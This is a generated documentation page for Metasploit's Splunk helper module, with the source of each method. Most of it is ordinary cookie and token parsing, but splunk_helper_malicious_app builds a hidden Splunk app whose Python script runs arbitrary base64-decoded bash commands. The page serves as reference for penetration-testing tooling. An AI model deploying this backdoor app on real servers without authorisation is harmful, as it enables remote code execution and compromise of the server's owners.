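<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::HTTP::Splunk::Helpers
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../../css/style.css">
<link rel="stylesheet" href="../../../../../css/common.css">
<!-- Page globals: the documented object's path and the relative path back to
     the documentation root. Presumably read by js/app.js (confirm); kept as
     bare assignments so they stay on the global scope. -->
<script>
pathId = "Msf::Exploit::Remote::HTTP::Splunk::Helpers";
relpath = '../../../../../';
</script>
<script src="../../../../../js/jquery.js"></script>
<script src="../../../../../js/app.js"></script>
</head>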
<body>
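<div class="nav_wrap">
<!-- Class-list navigation pane, loaded from a relative (same-origin) URL -->
<iframe id="nav" title="Class list" src="../../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>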
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../../_index.html">Index (H)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../HTTP.html" title="Msf::Exploit::Remote::HTTP (module)">HTTP</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Splunk.html" title="Msf::Exploit::Remote::HTTP::Splunk (module)">Splunk</a></span></span>
&raquo;
<span class="title">Helpers</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::HTTP::Splunk::Helpers
</h1>
<div class="box_info">
<dl>
<dt>Included in:</dt>
<dd><span class='object_link'><a href="../Splunk.html" title="Msf::Exploit::Remote::HTTP::Splunk (module)">Msf::Exploit::Remote::HTTP::Splunk</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/http/splunk/helpers.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>Module providing helper methods used by the other Splunk module methods</p>
</div>
</div>
<div class="tags">
</div>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#cookies_hash-instance_method" title="#cookies_hash (instance method)">#<strong>cookies_hash</strong>(cookie) &#x21d2; Hash </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Converts a cookie string into a hash.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#extract_csrf_token-instance_method" title="#extract_csrf_token (instance method)">#<strong>extract_csrf_token</strong>(cookie) &#x21d2; String<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Extracts the Splunk CSRF token from a cookie string.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#extract_next_page_vars-instance_method" title="#extract_next_page_vars (instance method)">#<strong>extract_next_page_vars</strong>(html) &#x21d2; Hash<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Extracts pagination parameters from the Next link in the Splunk table.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#filter_apps-instance_method" title="#filter_apps (instance method)">#<strong>filter_apps</strong>(apps, filter = {}) &#x21d2; Hash </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Filters a hash of Splunk apps based on provided attributes.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#splunk_helper_extract_token-instance_method" title="#splunk_helper_extract_token (instance method)">#<strong>splunk_helper_extract_token</strong>(timeout = 20) &#x21d2; String<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Helper method to get tokens for login.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#splunk_helper_malicious_app-instance_method" title="#splunk_helper_malicious_app (instance method)">#<strong>splunk_helper_malicious_app</strong>(app_name) &#x21d2; Rex::Text </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Helper method that constructs the malicious Splunk app as a gzip-compressed tar archive.</p>
</div></span>
</li>
</ul>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="cookies_hash-instance_method">
#<strong>cookies_hash</strong>(cookie) &#x21d2; <tt>Hash</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Converts a cookie string into a hash</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cookie</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Cookie string in the format "key1=value1; key2=value2"</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>Hash mapping cookie names to their values</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
110
111
112
113
114
115
116
117
118
119</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 110</span>
<span class='kw'>def</span> <span class='id identifier rubyid_cookies_hash'>cookies_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_cookie'>cookie</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='lbrace'>{</span><span class='rbrace'>}</span> <span class='kw'>if</span> <span class='id identifier rubyid_cookie'>cookie</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>||</span> <span class='id identifier rubyid_cookie'>cookie</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_cookie'>cookie</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_each_with_object'>each_with_object</span><span class='lparen'>(</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_pair'>pair</span><span class='comma'>,</span> <span class='id identifier rubyid_hash'>hash</span><span class='op'>|</span>
<span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_value'>value</span> <span class='op'>=</span> <span class='id identifier rubyid_pair'>pair</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>=</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='int'>2</span><span class='rparen'>)</span>
<span class='kw'>next</span> <span class='kw'>if</span> <span class='id identifier rubyid_key'>key</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>||</span> <span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_hash'>hash</span><span class='lbracket'>[</span><span class='id identifier rubyid_key'>key</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="extract_csrf_token-instance_method">
#<strong>extract_csrf_token</strong>(cookie) &#x21d2; <tt>String</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Extracts the Splunk CSRF token from a cookie string</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cookie</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Cookie string containing the CSRF token</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>, <tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>The CSRF token for the current Splunk port, or nil if no matching cookie is found</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
125
126
127
128
129
130
131
132
133
134</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 125</span>
<span class='kw'>def</span> <span class='id identifier rubyid_extract_csrf_token'>extract_csrf_token</span><span class='lparen'>(</span><span class='id identifier rubyid_cookie'>cookie</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span> <span class='kw'>if</span> <span class='id identifier rubyid_cookie'>cookie</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>||</span> <span class='id identifier rubyid_cookie'>cookie</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_cookies'>cookies</span> <span class='op'>=</span> <span class='id identifier rubyid_cookies_hash'>cookies_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_cookie'>cookie</span><span class='rparen'>)</span>
<span class='id identifier rubyid_target_key'>target_key</span> <span class='op'>=</span> <span class='id identifier rubyid_cookies'>cookies</span><span class='period'>.</span><span class='id identifier rubyid_keys'>keys</span><span class='period'>.</span><span class='id identifier rubyid_find'>find</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_key'>key</span><span class='op'>|</span>
<span class='id identifier rubyid_key'>key</span> <span class='op'>=~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>^splunkweb_csrf_token_(\d+)$</span><span class='regexp_end'>/</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_cookies'>cookies</span><span class='lbracket'>[</span><span class='id identifier rubyid_target_key'>target_key</span><span class='rbracket'>]</span> <span class='kw'>if</span> <span class='id identifier rubyid_target_key'>target_key</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="extract_next_page_vars-instance_method">
#<strong>extract_next_page_vars</strong>(html) &#x21d2; <tt>Hash</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Extracts pagination parameters from the Next link in the Splunk table.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>html</span>
<span class='type'>(<tt>Nokogiri::HTML::Document</tt>)</span>
&mdash;
<div class='inline'>
<p>The HTML document to parse.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>, <tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>A hash of the GET parameters from the Next link if a next page exists, otherwise nil.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
140
141
142
143
144
145
146
147
148
149
150</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 140</span>
<span class='kw'>def</span> <span class='id identifier rubyid_extract_next_page_vars'>extract_next_page_vars</span><span class='lparen'>(</span><span class='id identifier rubyid_html'>html</span><span class='rparen'>)</span>
<span class='id identifier rubyid_next_link'>next_link</span> <span class='op'>=</span> <span class='id identifier rubyid_html'>html</span><span class='period'>.</span><span class='id identifier rubyid_at'>at</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>li.next a</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span> <span class='kw'>unless</span> <span class='id identifier rubyid_next_link'>next_link</span><span class='op'>&amp;.</span><span class='op'>[]</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>href</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_query'>query</span> <span class='op'>=</span> <span class='const'>URI</span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_next_link'>next_link</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>href</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_query'>query</span>
<span class='id identifier rubyid_query'>query</span> <span class='op'>?</span> <span class='const'>Rack</span><span class='op'>::</span><span class='const'>Utils</span><span class='period'>.</span><span class='id identifier rubyid_parse_query'>parse_query</span><span class='lparen'>(</span><span class='id identifier rubyid_query'>query</span><span class='rparen'>)</span> <span class='op'>:</span> <span class='kw'>nil</span>
<span class='kw'>rescue</span> <span class='const'>URI</span><span class='op'>::</span><span class='const'>InvalidURIError</span>
<span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="filter_apps-instance_method">
#<strong>filter_apps</strong>(apps, filter = {}) &#x21d2; <tt>Hash</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Filters a hash of Splunk apps based on provided attributes</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>apps</span>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A hash of apps where keys are app names and values are attribute hashes</p>
</div>
</li>
<li>
<span class='name'>filter</span>
<span class='type'>(<tt>Hash</tt>)</span>
<em class="default">(defaults to: <tt>{}</tt>)</em>
&mdash;
<div class='inline'>
<p>A hash of attributes to filter by (e.g., { status: 'enabled' })</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A hash of apps that match all filter criteria</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
100
101
102
103
104</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 100</span>
<span class='kw'>def</span> <span class='id identifier rubyid_filter_apps'>filter_apps</span><span class='lparen'>(</span><span class='id identifier rubyid_apps'>apps</span><span class='comma'>,</span> <span class='id identifier rubyid_filter'>filter</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_apps'>apps</span><span class='period'>.</span><span class='id identifier rubyid_select'>select</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid__name'>_name</span><span class='comma'>,</span> <span class='id identifier rubyid_attributes'>attributes</span><span class='op'>|</span>
<span class='id identifier rubyid_filter'>filter</span><span class='period'>.</span><span class='id identifier rubyid_all?'>all?</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_value'>value</span><span class='op'>|</span> <span class='id identifier rubyid_attributes'>attributes</span><span class='lbracket'>[</span><span class='id identifier rubyid_key'>key</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='id identifier rubyid_value'>value</span> <span class='rbrace'>}</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="splunk_helper_extract_token-instance_method">
#<strong>splunk_helper_extract_token</strong>(timeout = 20) &#x21d2; <tt>String</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Helper method to get tokens for login</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>timeout</span>
<span class='type'>(<tt>Integer</tt>)</span>
<em class="default">(defaults to: <tt>20</tt>)</em>
&mdash;
<div class='inline'>
<p>The maximum number of seconds to wait before the request times out</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>, <tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>Post data to use for login, or nil if the login page could not be fetched</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
9
10
11
12
13
14
15
16
17
18
19
20
21</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 9</span>
<span class='kw'>def</span> <span class='id identifier rubyid_splunk_helper_extract_token'>splunk_helper_extract_token</span><span class='lparen'>(</span><span class='id identifier rubyid_timeout'>timeout</span> <span class='op'>=</span> <span class='int'>20</span><span class='rparen'>)</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_cgi'>send_request_cgi</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_splunk_url_login'>splunk_url_login</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>keep_cookies</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='kw'>true</span>
<span class='rbrace'>}</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_res'>res</span><span class='op'>&amp;.</span><span class='id identifier rubyid_code'>code</span> <span class='op'>==</span> <span class='int'>200</span>
<span class='id identifier rubyid_vprint_error'>vprint_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Unable to get login tokens</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>session_id_</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>=</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_numeric'>rand_text_numeric</span><span class='lparen'>(</span><span class='int'>40</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>; </span><span class='tstring_end'>&quot;</span></span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_get_cookies'>get_cookies</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="splunk_helper_malicious_app-instance_method">
#<strong>splunk_helper_malicious_app</strong>(app_name) &#x21d2; <tt>Rex::Text</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Helper method that constructs the malicious Splunk app as a gzip-compressed tar archive</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>app_name</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Name of app to upload</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Rex::Text</tt>)</span>
&mdash;
<div class='inline'>
<p>The malicious app as a gzip-compressed tar archive</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 27</span>
<span class='kw'>def</span> <span class='id identifier rubyid_splunk_helper_malicious_app'>splunk_helper_malicious_app</span><span class='lparen'>(</span><span class='id identifier rubyid_app_name'>app_name</span><span class='rparen'>)</span>
<span class='comment'># metadata folder
</span> <span class='id identifier rubyid_metadata'>metadata</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;~EOF</span>
<span class='tstring_content'> [commands]
</span><span class='tstring_content'> export = system
</span><span class='heredoc_end'> EOF
</span>
<span class='comment'># default folder
</span> <span class='id identifier rubyid_commands_conf'>commands_conf</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;~EOF</span>
<span class='tstring_content'> [</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>]
</span><span class='tstring_content'> type = python
</span><span class='tstring_content'> filename = </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>.py
</span><span class='tstring_content'> local = false
</span><span class='tstring_content'> enableheader = false
</span><span class='tstring_content'> streaming = false
</span><span class='tstring_content'> perf_warn_limit = 0
</span><span class='heredoc_end'> EOF
</span>
<span class='id identifier rubyid_app_conf'>app_conf</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;~EOF</span>
<span class='tstring_content'> [launcher]
</span><span class='tstring_content'> author=</span><span class='embexpr_beg'>#{</span><span class='const'>Faker</span><span class='op'>::</span><span class='const'>Name</span><span class='period'>.</span><span class='id identifier rubyid_name'>name</span><span class='embexpr_end'>}</span><span class='tstring_content'>
</span><span class='tstring_content'> description=</span><span class='embexpr_beg'>#{</span><span class='const'>Faker</span><span class='op'>::</span><span class='const'>Lorem</span><span class='period'>.</span><span class='id identifier rubyid_sentence'>sentence</span><span class='embexpr_end'>}</span><span class='tstring_content'>
</span><span class='tstring_content'> version=</span><span class='embexpr_beg'>#{</span><span class='const'>Faker</span><span class='op'>::</span><span class='const'>App</span><span class='period'>.</span><span class='id identifier rubyid_version'>version</span><span class='embexpr_end'>}</span><span class='tstring_content'>
</span><span class='tstring_content'>
</span><span class='tstring_content'> [ui]
</span><span class='tstring_content'> is_visible = false
</span><span class='heredoc_end'> EOF
</span>
<span class='comment'># bin folder
</span> <span class='id identifier rubyid_msf_exec_py'>msf_exec_py</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;~EOF</span>
<span class='tstring_content'> import sys, base64, subprocess
</span><span class='tstring_content'> import splunk.Intersplunk
</span><span class='tstring_content'>
</span><span class='tstring_content'> header = [&#39;result&#39;]
</span><span class='tstring_content'> results = []
</span><span class='tstring_content'>
</span><span class='tstring_content'> try:
</span><span class='tstring_content'> proc = subprocess.Popen([&#39;/bin/bash&#39;, &#39;-c&#39;, base64.b64decode(sys.argv[1]).decode()], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
</span><span class='tstring_content'> output = proc.stdout.read()
</span><span class='tstring_content'> results.append({&#39;result&#39;: base64.b64encode(output).decode(&#39;utf-8&#39;)})
</span><span class='tstring_content'> except Exception as e:
</span><span class='tstring_content'> error_msg = &#39;Error : &#39; + str(e)
</span><span class='tstring_content'> results = splunk.Intersplunk.generateErrorResults(error_msg)
</span><span class='tstring_content'>
</span><span class='tstring_content'> splunk.Intersplunk.outputResults(results, fields=header)
</span><span class='heredoc_end'> EOF
</span>
<span class='id identifier rubyid_tarfile'>tarfile</span> <span class='op'>=</span> <span class='const'>StringIO</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Tar.html" title="Rex::Tar (module)">Tar</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Tar/Writer.html" title="Rex::Tar::Writer (class)">Writer</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span> <span class='id identifier rubyid_tarfile'>tarfile</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_tar'>tar</span><span class='op'>|</span>
<span class='id identifier rubyid_tar'>tar</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>/metadata/default.meta</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='int'>0o644</span><span class='rparen'>)</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_io'>io</span><span class='op'>|</span>
<span class='id identifier rubyid_io'>io</span><span class='period'>.</span><span class='id identifier rubyid_write'>write</span> <span class='id identifier rubyid_metadata'>metadata</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tar'>tar</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>/default/commands.conf</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='int'>0o644</span><span class='rparen'>)</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_io'>io</span><span class='op'>|</span>
<span class='id identifier rubyid_io'>io</span><span class='period'>.</span><span class='id identifier rubyid_write'>write</span> <span class='id identifier rubyid_commands_conf'>commands_conf</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tar'>tar</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>/default/app.conf</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='int'>0o644</span><span class='rparen'>)</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_io'>io</span><span class='op'>|</span>
<span class='id identifier rubyid_io'>io</span><span class='period'>.</span><span class='id identifier rubyid_write'>write</span> <span class='id identifier rubyid_app_conf'>app_conf</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tar'>tar</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>/bin/</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>.py</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='int'>0o644</span><span class='rparen'>)</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_io'>io</span><span class='op'>|</span>
<span class='id identifier rubyid_io'>io</span><span class='period'>.</span><span class='id identifier rubyid_write'>write</span> <span class='id identifier rubyid_msf_exec_py'>msf_exec_py</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tarfile'>tarfile</span><span class='period'>.</span><span class='id identifier rubyid_rewind'>rewind</span>
<span class='id identifier rubyid_tarfile'>tarfile</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span>
<span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_gzip'>gzip</span><span class='lparen'>(</span><span class='id identifier rubyid_tarfile'>tarfile</span><span class='period'>.</span><span class='id identifier rubyid_string'>string</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:28 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>